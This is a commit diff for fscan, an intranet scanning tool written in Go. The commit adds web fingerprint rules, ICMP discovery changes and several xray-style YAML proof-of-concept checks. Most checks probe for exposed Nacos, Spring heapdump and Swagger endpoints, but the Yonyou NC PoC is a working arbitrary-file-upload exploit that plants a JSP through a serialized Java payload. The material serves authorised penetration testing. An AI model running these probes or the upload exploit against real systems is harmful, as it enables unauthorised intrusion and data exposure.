Update README.md

修改报错提示,--debug时,如果10秒内没有LogSuccess的消息,每隔10秒就会打印一下当前进度

Plugins/icmp.go

@@ -53,12 +53,13 @@ func GetSys() SystemInfo {
 }
 
 func IcmpCheck(hostslist []string) {
+	TmpHosts := make(map[string]struct{})
+	var chanHosts = make(chan string)
 	conn, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
 	endflag := false
 	if err != nil {
 		log.Fatal(err)
 	}
-	var chanHosts = make(chan string)
 	go func() {
 		for {
 			if endflag == true {
@@ -74,7 +75,8 @@ func IcmpCheck(hostslist []string) {
 
 	go func() {
 		for ip := range chanHosts {
-			if !IsContain(AliveHosts, ip) {
+			if _, ok := TmpHosts[ip]; !ok {
+				TmpHosts[ip] = struct{}{}
 				fmt.Printf("(icmp) Target '%s' is alive\n", ip)
 				AliveHosts = append(AliveHosts, ip)
 			}
@@ -84,11 +86,13 @@ func IcmpCheck(hostslist []string) {
 	for _, host := range hostslist {
 		write(host, conn)
 	}
-	if len(hostslist) > 10 {
+
+	if len(hostslist) > 255 {
 		time.Sleep(6 * time.Second)
 	} else {
 		time.Sleep(3 * time.Second)
 	}
+
 	endflag = true
 	close(chanHosts)
 	conn.Close()

Plugins/webtitle.go

@@ -13,7 +13,9 @@ import (
 	"time"
 )
 
-func WebTitle(info *common.HostInfo) (err error, result string) {
+var CheckData []WebScan.CheckDatas
+
+func WebTitle(info *common.HostInfo) error {
 	if info.Ports == "80" {
 		info.Url = fmt.Sprintf("http://%s", info.Host)
 	} else if info.Ports == "443" {
@@ -22,24 +24,36 @@ func WebTitle(info *common.HostInfo) (err error, result string) {
 		info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
 	}
 
-	err, result = geturl(info)
-	if common.IsWebCan || err != nil {
-		return
+	err, result := geturl(info, true)
+	if err != nil {
+		return err
+	}
+	if result == "https" {
+		err, _ := geturl(info, true)
+		if err != nil {
+			return err
+		}
 	}
 
-	if result == "https" {
-		err, result = geturl(info)
-		if err == nil {
-			WebScan.WebScan(info)
-		}
-	} else {
+	err, _ = geturl(info, false)
+	if err != nil {
+		return err
+	}
+
+	WebScan.InfoCheck(info.Url, CheckData)
+
+	if common.IsWebCan == false {
 		WebScan.WebScan(info)
 	}
-	return err, result
+
+	return err
 }
 
-func geturl(info *common.HostInfo) (err error, result string) {
-	url := info.Url
+func geturl(info *common.HostInfo, flag bool) (err error, result string) {
+	Url := info.Url
+	if flag == false {
+		Url += "/favicon.ico"
+	}
 	tr := &http.Transport{
 		TLSClientConfig:   &tls.Config{InsecureSkipVerify: true},
 		DisableKeepAlives: false,
@@ -52,14 +66,22 @@ func geturl(info *common.HostInfo) (err error, result string) {
 		IdleConnTimeout:     time.Duration(info.WebTimeout+3) * time.Second,
 		TLSHandshakeTimeout: 5 * time.Second,
 	}
+	//u, err := url.Parse("http://127.0.0.1:8080")
+	//if err != nil {
+	//	return err,result
+	//}
+	//tr.Proxy = http.ProxyURL(u)
 
 	var client = &http.Client{Timeout: time.Duration(info.WebTimeout) * time.Second, Transport: tr}
-	res, err := http.NewRequest("GET", url, nil)
+	res, err := http.NewRequest("GET", Url, nil)
 	if err == nil {
 		res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
 		res.Header.Add("Accept", "*/*")
 		res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
 		res.Header.Add("Accept-Encoding", "gzip, deflate")
+		if flag == true {
+			res.Header.Add("Cookie", "rememberMe=1")
+		}
 		res.Header.Add("Connection", "close")
 		resp, err := client.Do(res)
 		if err == nil {
@@ -76,8 +98,13 @@ func geturl(info *common.HostInfo) (err error, result string) {
 			} else {
 				title = "None"
 			}
-			result = fmt.Sprintf("WebTitle:%-25v %-3v %v", url, resp.StatusCode, title)
-			common.LogSuccess(result)
+			if flag == true {
+				result = fmt.Sprintf("WebTitle:%-25v %-3v %v", Url, resp.StatusCode, title)
+				common.LogSuccess(result)
+			}
+
+			CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
+
 			if resp.StatusCode == 400 && info.Url[:5] != "https" {
 				info.Url = strings.Replace(info.Url, "http://", "https://", 1)
 				return err, "https"

README.md

@@ -14,6 +14,7 @@
    因为用习惯了f-scrack，习惯一条命令跑完所有模块，省去一个个模块单独调用的时间，当然我附加了-m 指定模块的功能。
 
 ## 最近更新
+[+] 2021/2/8 增加指纹识别功能,可识别尝试CMS、框架,如致远OA、通达OA等。  
 [+] 2021/2/5 修改icmp发包模式,更适合大规模探测。   
    修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度    
 [+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试    
@@ -124,4 +125,4 @@ https://github.com/Adminisme/ServerScan
 https://github.com/netxfly/x-crack  
 https://github.com/hack2fun/Gscan  
 https://github.com/k8gege/LadonGo   
-https://github.com/jjf012/gopoc
+https://github.com/jjf012/gopoc

WebScan/InfoScan.go

@@ -0,0 +1,69 @@
+package WebScan
+
+import (
+	"crypto/md5"
+	"fmt"
+	"github.com/shadow1ng/fscan/WebScan/info"
+	"github.com/shadow1ng/fscan/common"
+	"regexp"
+	"strings"
+)
+
+type CheckDatas struct {
+	Body    []byte
+	Headers string
+}
+
+func InfoCheck(Url string, CheckData []CheckDatas) {
+	var matched bool
+	var infoname []string
+
+	for _, data := range CheckData {
+		for _, rule := range info.RuleDatas {
+			if rule.Type == "code" {
+				matched, _ = regexp.MatchString(rule.Rule, string(data.Body))
+			} else {
+				matched, _ = regexp.MatchString(rule.Rule, data.Headers)
+			}
+			if matched == true {
+				infoname = append(infoname, rule.Name)
+			}
+		}
+		flag, name := CalcMd5(data.Body)
+
+		if flag == true {
+			infoname = append(infoname, name)
+		}
+	}
+
+	infostr := RemoveMore(infoname)
+
+	if len(infoname) > 0 {
+		result := fmt.Sprintf("[+] InfoScan:%-25v %s ", Url, infostr)
+		common.LogSuccess(result)
+	}
+}
+
+func CalcMd5(Body []byte) (bool, string) {
+	has := md5.Sum(Body)
+	md5str := fmt.Sprintf("%x", has)
+	for _, md5data := range info.Md5Datas {
+		if md5str == md5data.Md5Str {
+			return true, md5data.Name
+		}
+	}
+	return false, ""
+}
+
+func RemoveMore(a []string) (infostr string) {
+	var ret []string
+	for i := 0; i < len(a); i++ {
+		if (i > 0 && a[i-1] == a[i]) || len(a[i]) == 0 {
+			continue
+		}
+		ret = append(ret, a[i])
+	}
+	infostr = strings.ReplaceAll(fmt.Sprintf("%s ", ret), "[", "")
+	infostr = strings.ReplaceAll(infostr, "]", "")
+	return
+}

WebScan/info/rules.go

@@ -0,0 +1,137 @@
+package info
+
+type RuleData struct {
+	Name string
+	Type string
+	Rule string
+}
+
+type Md5Data struct {
+	Name   string
+	Md5Str string
+}
+
+var RuleDatas = []RuleData{
+	{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
+	{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
+	{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
+	{"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
+	{"宝塔-BT.cn", "code", "(app.bt.cn/static/app.png|安全入口校验失败)"},
+	{"Nexus", "code", "(Nexus Repository Manager)"},
+	{"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
+	{"Harbor", "code", "(<title>Harbor</title>)"},
+	{"Harbor", "cookie", "(harbor-lang)"},
+	{"禅道", "code", "(/theme/default/images/main/zt-logo.png)"},
+	{"禅道", "cookie", "(zentaosid)"},
+	{"协众OA", "code", "(Powered by 协众OA)"},
+	{"协众OA", "cookie", "(CNOAOASESSID)"},
+	{"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
+	{"atmail-WebMail", "cookie", "(atmail6)"},
+	{"atmail-WebMail", "code", "(Powered by Atmail)"},
+	{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin)"},
+	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
+	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
+	{"Typecho", "code", "(Typecho</a>)"},
+	{"金蝶EAS", "code", "(easSessionId)"},
+	{"phpMyAdmin", "cookie", "(pma_lang|phpMyAdmin)"},
+	{"phpMyAdmin", "code", "(/themes/pmahomme/img/logo_right.png)"},
+	{"H3C-AM8000", "code", "(AM8000)"},
+	{"360企业版", "code", "(360EntWebAdminMD5Secret)"},
+	{"H3C公司产品", "code", "(service@h3c.com)"},
+	{"H3C ICG 1000", "code", "(ICG 1000系统管理)"},
+	{"Citrix-Metaframe", "code", "(window.location=\"/Citrix/MetaFrame)"},
+	{"H3C ER5100", "code", "(ER5100系统管理)"},
+	{"阿里云CDN", "code", "(cdn.aliyuncs.com)"},
+	{"CISCO_EPC3925", "code", "(Docsis_system)"},
+	{"CISCO ASR", "code", "(CISCO ASR)"},
+	{"H3C ER3200", "code", "(ER3200系统管理)"},
+	{"万户ezOFFICE", "headers", "(LocLan)"},
+	{"万户网络", "code", "(css/css_whir.css)"},
+	{"Spark_Master", "code", "(Spark Master at)"},
+	{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
+	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+	{"深信服ssl-vpn", "code", "(login_psw.csp)"},
+	{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
+	{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
+	{"juniper_vpn", "code", "(welcome.cgi?p=logo|/images/logo_juniper_reversed.gif)"},
+	{"360主机卫士", "headers", "(zhuji.360.cn)"},
+	{"Nagios", "headers", "(Nagios Access)"},
+	{"H3C ER8300", "code", "(ER8300系统管理)"},
+	{"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"},
+	{"华为 MCU", "code", "(McuR5-min.js)"},
+	{"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
+	{"泛微协同办公OA", "headers", "(ecology_JSessionid)"},
+	{"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
+	{"360网站卫士", "code", "(360wzb)"},
+	{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
+	{"H3C ER2100V2", "code", "(ER2100V2系统管理)"},
+	{"zabbix", "cookie", "(zbx_sessionid)"},
+	{"zabbix", "code", "(images/general/zabbix.ico|Zabbix SIA)"},
+	{"CISCO_VPN", "headers", "(webvpn)"},
+	{"360站长平台", "code", "(360-site-verification)"},
+	{"H3C ER3108GW", "code", "(ER3108GW系统管理)"},
+	{"o2security_vpn", "headers", "(client_param=install_active)"},
+	{"H3C ER3260G2", "code", "(ER3260G2系统管理)"},
+	{"H3C ICG1000", "code", "(ICG1000系统管理)"},
+	{"CISCO-CX20", "code", "(CISCO-CX20)"},
+	{"H3C ER5200", "code", "(ER5200系统管理)"},
+	{"linksys-vpn-bragap14-parintins", "code",
+		"(linksys-vpn-bragap14-parintins)"},
+	{"360网站卫士常用前端公共库", "code", "(libs.useso.com)"},
+	{"H3C ER3100", "code", "(ER3100系统管理)"},
+	{"H3C-SecBlade-FireWall", "code", "(js/MulPlatAPI.js)"},
+	{"360webfacil_360WebManager", "code", "(publico/template/)"},
+	{"Citrix_Netscaler", "code", "(ns_af)"},
+	{"H3C ER6300G2", "code", "(ER6300G2系统管理)"},
+	{"H3C ER3260", "code", "(ER3260系统管理)"},
+	{"华为_HUAWEI_SRG3250", "code", "(HUAWEI SRG3250)"},
+	{"exchange", "code", "(/owa/auth.owa)"},
+	{"Spark_Worker", "code", "(Spark Worker at)"},
+	{"H3C ER3108G", "code", "(ER3108G系统管理)"},
+	{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
+	{"Citrix-ConfProxy", "code", "(confproxy)"},
+	{"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
+	{"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
+	{"华为（HUAWEI）安全设备", "code", "(sweb-lib/resource/)"},
+	{"H3C ER6300", "code", "(ER6300系统管理)"},
+	{"华为_HUAWEI_ASG2100", "code", "(HUAWEI ASG2100)"},
+	{"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
+	{"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
+	{"H3C ER2100", "code", "(ER2100系统管理)"},
+	{"绿盟下一代防火墙", "code", "(NSFOCUS NF)"},
+	{"jira", "code", "(jira.webresources)"},
+	{"金和协同管理平台", "code", "(金和协同管理平台)"},
+	{"Citrix-NetScaler", "code", "(NS-CACHE)"},
+	{"linksys-vpn", "headers", "(linksys-vpn)"},
+	{"通达OA", "code", "(/static/images/tongda.ico)"},
+	{"华为（HUAWEI）Secoway设备", "code", "(Secoway)"},
+	{"华为_HUAWEI_SRG1220", "code", "(HUAWEI SRG1220)"},
+	{"H3C ER2100n", "code", "(ER2100n系统管理)"},
+	{"H3C ER8300G2", "code", "(ER8300G2系统管理)"},
+	{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js)"},
+	{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
+	{"Jboss", "headers", "(JBoss)"},
+	{"泛微E-mobile", "code", "(Weaver E-mobile)"},
+	{"齐治堡垒机", "code", "(logo-icon-ico72.png)"},
+}
+
+var Md5Datas = []Md5Data{
+	{"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
+	{"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
+	{"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
+	{"锐捷网关", "d8d7c9138e93d43579ebf2e384745ba8"},
+	{"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
+	{"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
+	{"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
+	{"致远OA", "57f307ad3764553df84e7b14b7a85432"},
+	{"致远OA", "3c8df395ec2cbd72782286d18a286a9a"},
+	{"致远OA", "2f761c27b6b7f9386bbd61403635dc42"},
+	{"齐治堡垒机", "48ee373f098d8e96e53b7dd778f09ff4"},
+	{"SprintBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
+	{"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
+	{"通达OA", "ed0044587917c76d08573577c8b72883"},
+	{"泛微OA", "41eca7a9245394106a09b2534d8030df"},
+	{"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
+	{"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
+	{"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
+}

WebScan/lib/check.go

@@ -94,6 +94,8 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
 				variableMap[k] = UrlTypeToString(value)
 			case int64:
 				variableMap[k] = int(value)
+			case []uint8:
+				variableMap[k] = fmt.Sprintf("%s", out)
 			default:
 				variableMap[k] = fmt.Sprintf("%v", out)
 			}

WebScan/pocs/alibaba-nacos-api-unauth.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-alibaba-nacos-api-unauth
+rules:
+  - method: GET
+    path: /nacos/v1/auth/users?pageNo=1&pageSize=9
+    headers:
+      User-Agent: Nacos-Server
+    follow_redirects: true
+    expression: |
+      response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos-api-unauth
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424

WebScan/pocs/alibaba-nacos.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-alibaba-nacos
+rules:
+  - method: GET
+    path: /nacos/
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(bytes("<title>Nacos</title>"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424

WebScan/pocs/shiro.yml

@@ -1,12 +0,0 @@
-name: poc-yaml-shiro
-rules:
-  - method: GET
-    path: /
-    headers:
-      Cookie: rememberMe=1
-    expression: |
-      "Set-Cookie" in response.headers && response.headers["Set-Cookie"].contains("rememberMe")
-detail:
-  author: test
-  links:
-    - https://baidu.com/shiro

WebScan/pocs/spring-actuator-heapdump-file.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-spring-actuator-heapdump-file
+rules:
+  - method: HEAD
+    path: /actuator/heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-actuator-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html

WebScan/pocs/spring-heapdump-file.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-spring-heapdump-file
+rules:
+  - method: HEAD
+    path: /heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html

WebScan/pocs/swagger-ui-unauth-No1.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/swagger-ui-unauth-No2.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /api/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/swagger-ui-unauth-No3.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /service/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/swagger-ui-unauth-No4.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /web/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/swagger-ui-unauth-No5.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/swagger-ui-unauth-No6.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /actuator/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/swagger-ui-unauth-No7.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /libs/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/swagger-ui-unauth-No8.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /template/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210

WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml

@@ -0,0 +1,26 @@
+name: poc-yaml-yonyou-nc-arbitrary-file-upload
+set:
+  r1: randomInt(10000, 20000)
+  r2: randomInt(1000000000, 2000000000)
+  r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t"
+  r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx"
+rules:
+  - method: POST
+    path: /servlet/FileReceiveServlet
+    headers:
+      Content-Type: multipart/form-data;
+    body: >-
+      {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+    expression: |
+      response.status == 200
+  - method: GET
+    path: '/{{r1}}.jsp'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r2)))
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "YONYOU NC > 6.5"
+  links:
+    - https://blog.csdn.net/weixin_44578334/article/details/110917053

common/ParseIP.go

@@ -117,7 +117,6 @@ func ParseIPC(ip string) ([]string, error) {
 	} else {
 		SplitIP1 := strings.Split(IPRange[0], ".")
 		SplitIP2 := strings.Split(IPRange[1], ".")
-		fmt.Println(SplitIP1, SplitIP2, len(SplitIP1), len(SplitIP2))
 		if len(SplitIP1) != 4 || len(SplitIP2) != 4 {
 			return nil, ParseIPErr
 		}
@@ -132,7 +131,6 @@ func ParseIPC(ip string) ([]string, error) {
 		}
 		startNum := start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3]
 		endNum := end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3]
-		fmt.Println(startNum, endNum)
 		for num := startNum; num < endNum; num++ {
 			ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff)
 			AllIP = append(AllIP, ip)

common/flag.go

@@ -11,7 +11,7 @@ func Banner() {
  / /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
 / /_\\_____\__ \ (__| | | (_| | (__|   <    
 \____/     |___/\___|_|  \__,_|\___|_|\_\   
-                     fscan version: 1.5.0
+                     fscan version: 1.5.1
 `
 	print(banner)
 }
@@ -25,7 +25,7 @@ func Flag(Info *HostInfo) {
 	flag.StringVar(&Info.Username, "user", "", "username")
 	flag.StringVar(&Info.Password, "pwd", "", "password")
 	flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
-	flag.Int64Var(&Info.WebTimeout, "wt", 3, "Set web timeout")
+	flag.Int64Var(&Info.WebTimeout, "wt", 5, "Set web timeout")
 	flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
 
 	flag.IntVar(&Threads, "t", 200, "Thread nums")